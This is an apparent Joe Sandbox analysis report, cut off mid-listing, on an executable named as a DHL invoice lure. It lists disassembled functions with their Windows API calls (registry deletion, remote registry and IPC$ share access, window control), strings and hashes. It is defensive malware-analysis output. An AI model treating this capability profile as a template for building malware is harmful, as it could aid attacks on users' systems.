                                                                                                                        • _free.LIBCMT ref: 0036DA96
                                                                                                                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                                                                                                                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                                                                                                                        • _free.LIBCMT ref: 0036DAB8
                                                                                                                        • _free.LIBCMT ref: 0036DACD
                                                                                                                        • _free.LIBCMT ref: 0036DAD8
                                                                                                                        • _free.LIBCMT ref: 0036DAFA
                                                                                                                        • _free.LIBCMT ref: 0036DB0D
                                                                                                                        • _free.LIBCMT ref: 0036DB1B
                                                                                                                        • _free.LIBCMT ref: 0036DB26
                                                                                                                        • _free.LIBCMT ref: 0036DB5E
                                                                                                                        • _free.LIBCMT ref: 0036DB65
                                                                                                                        • _free.LIBCMT ref: 0036DB82
                                                                                                                        • _free.LIBCMT ref: 0036DB9A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 161543041-0
                                                                                                                        • Opcode ID: 278177196097487cac48de3a350a71367e66c0310c5230840ccae3f19cb8f322
                                                                                                                        • Instruction ID: dfc110e27de1b08c7e9c5d28a5194ca201564474e56af22a5237be7576bcf861
                                                                                                                        • Opcode Fuzzy Hash: 278177196097487cac48de3a350a71367e66c0310c5230840ccae3f19cb8f322
                                                                                                                        • Instruction Fuzzy Hash: A6315A31B046049FEB27AA79E845B6B77E9FF42350F16C419E449DB199DB30AC508720
                                                                                                                        Function 0039365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0039369C
                                                                                                                        • _wcslen.LIBCMT ref: 003936A7
                                                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00393797
                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0039380C
                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 0039385D
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00393882
                                                                                                                        • GetParent.USER32(?), ref: 003938A0
                                                                                                                        • ScreenToClient.USER32(00000000), ref: 003938A7
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00393921
                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0039395D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                                        • String ID: %s%u
                                                                                                                        • API String ID: 4010501982-679674701
                                                                                                                        • Opcode ID: 5748febb2b875b52b7824c17dc473fbeb6ca6a0dd5ecd003dacd9614d32afd35
                                                                                                                        • Instruction ID: a648bcd9a0d8653c253dd18489b8d66cd5745203d74aaeb2d8ee2e2aad52fb8f
                                                                                                                        • Opcode Fuzzy Hash: 5748febb2b875b52b7824c17dc473fbeb6ca6a0dd5ecd003dacd9614d32afd35
                                                                                                                        • Instruction Fuzzy Hash: 1791B3B1204606AFDB1ADF64C885FEAF7A8FF44350F008529F999D6190DB30EA59CB91
                                                                                                                        Function 00394954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00394994
                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 003949DA
                                                                                                                        • _wcslen.LIBCMT ref: 003949EB
                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 003949F7
                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 00394A2C
                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00394A64
                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00394A9D
                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00394AE6
                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00394B20
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00394B8B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                        • String ID: ThumbnailClass
                                                                                                                        • API String ID: 1311036022-1241985126
                                                                                                                        • Opcode ID: 210c1f81d6bb26001a7abf102b0a2b2a5b867d8f13517cefe66c46e7e29ed6d6
                                                                                                                        • Instruction ID: f5db9d029bac249ef57305214df8310d543c629ec440f2e50064f5608c127cc6
                                                                                                                        • Opcode Fuzzy Hash: 210c1f81d6bb26001a7abf102b0a2b2a5b867d8f13517cefe66c46e7e29ed6d6
                                                                                                                        • Instruction Fuzzy Hash: BA91A1721082059FDF06DF14C985FAA77E8FF84314F05846AFD899A196EB30ED46CBA1
                                                                                                                        Function 003C3A23 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 182windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003C3A9D
                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003C3AA0
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003C3AC7
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003C3AEA
                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003C3B62
                                                                                                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 003C3BAC
                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 003C3BC7
                                                                                                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 003C3BE2
                                                                                                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 003C3BF6
                                                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 003C3C13
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 312131281-2513823414
                                                                                                                        • Opcode ID: 26b5531d4a7ea3b957e06b9065284c0a13683d04dcfefc3ce1d7da5a74432f59
                                                                                                                        • Instruction ID: f2f70812aee2608e0b5ad3995fbe8d521817498e62f6b6a424d07b88d3379393
                                                                                                                        • Opcode Fuzzy Hash: 26b5531d4a7ea3b957e06b9065284c0a13683d04dcfefc3ce1d7da5a74432f59
                                                                                                                        • Instruction Fuzzy Hash: 38616B75900248AFDB11DFA8CD81FEE77B8EB09700F1081A9FA15EB2A1D774AE45DB50
                                                                                                                        Function 0039DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0039DC20
                                                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0039DC46
                                                                                                                        • _wcslen.LIBCMT ref: 0039DC50
                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 0039DCA0
                                                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0039DCBC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                        • API String ID: 1939486746-1459072770
                                                                                                                        • Opcode ID: eeb06fe88d3705b24a8b9bf1c475865b1ce4130ed402c5016eafa5068e9d0fe6
                                                                                                                        • Instruction ID: 67e0d47ec28dfcf9665c95966379efb694eab1354ccf75ba46f845ddaed42042
                                                                                                                        • Opcode Fuzzy Hash: eeb06fe88d3705b24a8b9bf1c475865b1ce4130ed402c5016eafa5068e9d0fe6
                                                                                                                        • Instruction Fuzzy Hash: 71413332940204BAEB17AB748C47FFF77ACEF46751F14046AF904EA192EB74AD0187A4
                                                                                                                        Function 003BCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 003BCC64
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 003BCC8D
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 003BCD48
                                                                                                                          • Part of subcall function 003BCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 003BCCAA
                                                                                                                          • Part of subcall function 003BCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 003BCCBD
                                                                                                                          • Part of subcall function 003BCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003BCCCF
                                                                                                                          • Part of subcall function 003BCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 003BCD05
                                                                                                                          • Part of subcall function 003BCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 003BCD28
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 003BCCF3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                        • API String ID: 2734957052-4033151799
                                                                                                                        • Opcode ID: 79634a6c6e22e14e546e98f3014191d0ce55a44d14f00d2020aead9a063b073f
                                                                                                                        • Instruction ID: a43ffb52aa72931739b60d47447d44d2582763403a39ff6c64ac50f65ac4f65f
                                                                                                                        • Opcode Fuzzy Hash: 79634a6c6e22e14e546e98f3014191d0ce55a44d14f00d2020aead9a063b073f
                                                                                                                        • Instruction Fuzzy Hash: 7C31A075911129BBD7328B51DC88EFFBB7CEF51744F001169EA0AE2100D6309A46DBA0
                                                                                                                        Function 0039E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • timeGetTime.WINMM ref: 0039E6B4
                                                                                                                          • Part of subcall function 0034E551: timeGetTime.WINMM(?,?,0039E6D4), ref: 0034E555
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0039E6E1
                                                                                                                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0039E705
                                                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0039E727
                                                                                                                        • SetActiveWindow.USER32 ref: 0039E746
                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0039E754
                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0039E773
                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 0039E77E
                                                                                                                        • IsWindow.USER32 ref: 0039E78A
                                                                                                                        • EndDialog.USER32(00000000), ref: 0039E79B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                        • String ID: BUTTON
                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                        • Opcode ID: be737da9fb929e383571a955436125f0c82f3ae6c695beee5843a908c82b4f26
                                                                                                                        • Instruction ID: ebb1aa120ed037245db8b26b3c5e69ffd9e376789b486543b344a98aa56c72f4
                                                                                                                        • Opcode Fuzzy Hash: be737da9fb929e383571a955436125f0c82f3ae6c695beee5843a908c82b4f26
                                                                                                                        • Instruction Fuzzy Hash: EE2150B0210205AFFF03AF61EE8DE253B6DF755748F181834F915E15A1DBB2AC408B19
                                                                                                                        Function 0039E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0039EA5D
                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0039EA73
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0039EA84
                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0039EA96
                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0039EAA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: SendString$_wcslen
                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                        • API String ID: 2420728520-1007645807
                                                                                                                        • Opcode ID: 7af52402bff7cbbd550038b61d434d240f5be0d11ed818a6f214b1214d44723a
                                                                                                                        • Instruction ID: 18d869fd9af7cc97c36932f1d242e6ef5431f4344e293f3f38239a94e9d51967
                                                                                                                        • Opcode Fuzzy Hash: 7af52402bff7cbbd550038b61d434d240f5be0d11ed818a6f214b1214d44723a
                                                                                                                        • Instruction Fuzzy Hash: 84117331A9025D79EB22E7A1DC8AEFF6A7CEBD1B00F404429F501A60E1EFB05D05C6B0
                                                                                                                        Function 003C8B02 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                          • Part of subcall function 0034912D: GetCursorPos.USER32(?), ref: 00349141
                                                                                                                          • Part of subcall function 0034912D: ScreenToClient.USER32(00000000,?), ref: 0034915E
                                                                                                                          • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000001), ref: 00349183
                                                                                                                          • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000002), ref: 0034919D
                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 003C8B6B
                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 003C8B71
                                                                                                                        • ReleaseCapture.USER32 ref: 003C8B77
                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 003C8C12
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 003C8C25
                                                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 003C8CFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#@$xV
                                                                                                                        • API String ID: 1924731296-2825210122
                                                                                                                        • Opcode ID: 4be898ad986f1d6853ef2a71bf83939352d8fd0a4ae074ecee7de7dc3e5f8e66
                                                                                                                        • Instruction ID: c12e06f26dbef3d3ebae04ea9392cfc7e8f5530fead4e9ee5b96408c1d51cb87
                                                                                                                        • Opcode Fuzzy Hash: 4be898ad986f1d6853ef2a71bf83939352d8fd0a4ae074ecee7de7dc3e5f8e66
                                                                                                                        • Instruction Fuzzy Hash: 62515B71104304AFD706EF24D995FAA77E4FB88714F00062DF956AB2E1CB71AE44CB62
                                                                                                                        Function 003996E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0037F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00399717
                                                                                                                        • LoadStringW.USER32(00000000,?,0037F7F8,00000001), ref: 00399720
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0037F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00399742
                                                                                                                        • LoadStringW.USER32(00000000,?,0037F7F8,00000001), ref: 00399745
                                                                                                                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00399866
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                        • API String ID: 747408836-2268648507
                                                                                                                        • Opcode ID: 23a1d1e0bc635c6cbf1cac1bbad6f09daf5273cc93f54ac3943df6319ccd395d
                                                                                                                        • Instruction ID: d8199f90e3e5e1f3f5981dc8fe3aa7bbf71795182e6faa6172313a7aeed73516
                                                                                                                        • Opcode Fuzzy Hash: 23a1d1e0bc635c6cbf1cac1bbad6f09daf5273cc93f54ac3943df6319ccd395d
                                                                                                                        • Instruction Fuzzy Hash: 76414072904109AACF06FBE4CE86EEE737CAF55340F10406AF6057A092EB756F48CB61
                                                                                                                        Function 003906DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003907A2
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003907BE
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003907DA
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00390804
                                                                                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0039082C
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00390837
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0039083C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                        • API String ID: 323675364-22481851
                                                                                                                        • Opcode ID: e57c1433d0dba7a52a9ac717bf690938220e184be316cd02c42104f773c0c76c
                                                                                                                        • Instruction ID: 18d130fdfe1bfb7c468a31f999b82813247d0794c837a29c3d65f25f6f1ac539
                                                                                                                        • Opcode Fuzzy Hash: e57c1433d0dba7a52a9ac717bf690938220e184be316cd02c42104f773c0c76c
                                                                                                                        • Instruction Fuzzy Hash: DD411672D10229AFCF16EBA4DC95DEEB778BF44350F058169E905A7160EB70AE04CBA0
                                                                                                                        Function 003B3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 003B3C5C
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 003B3C8A
                                                                                                                        • CoUninitialize.OLE32 ref: 003B3C94
                                                                                                                        • _wcslen.LIBCMT ref: 003B3D2D
                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 003B3DB1
                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 003B3ED5
                                                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 003B3F0E
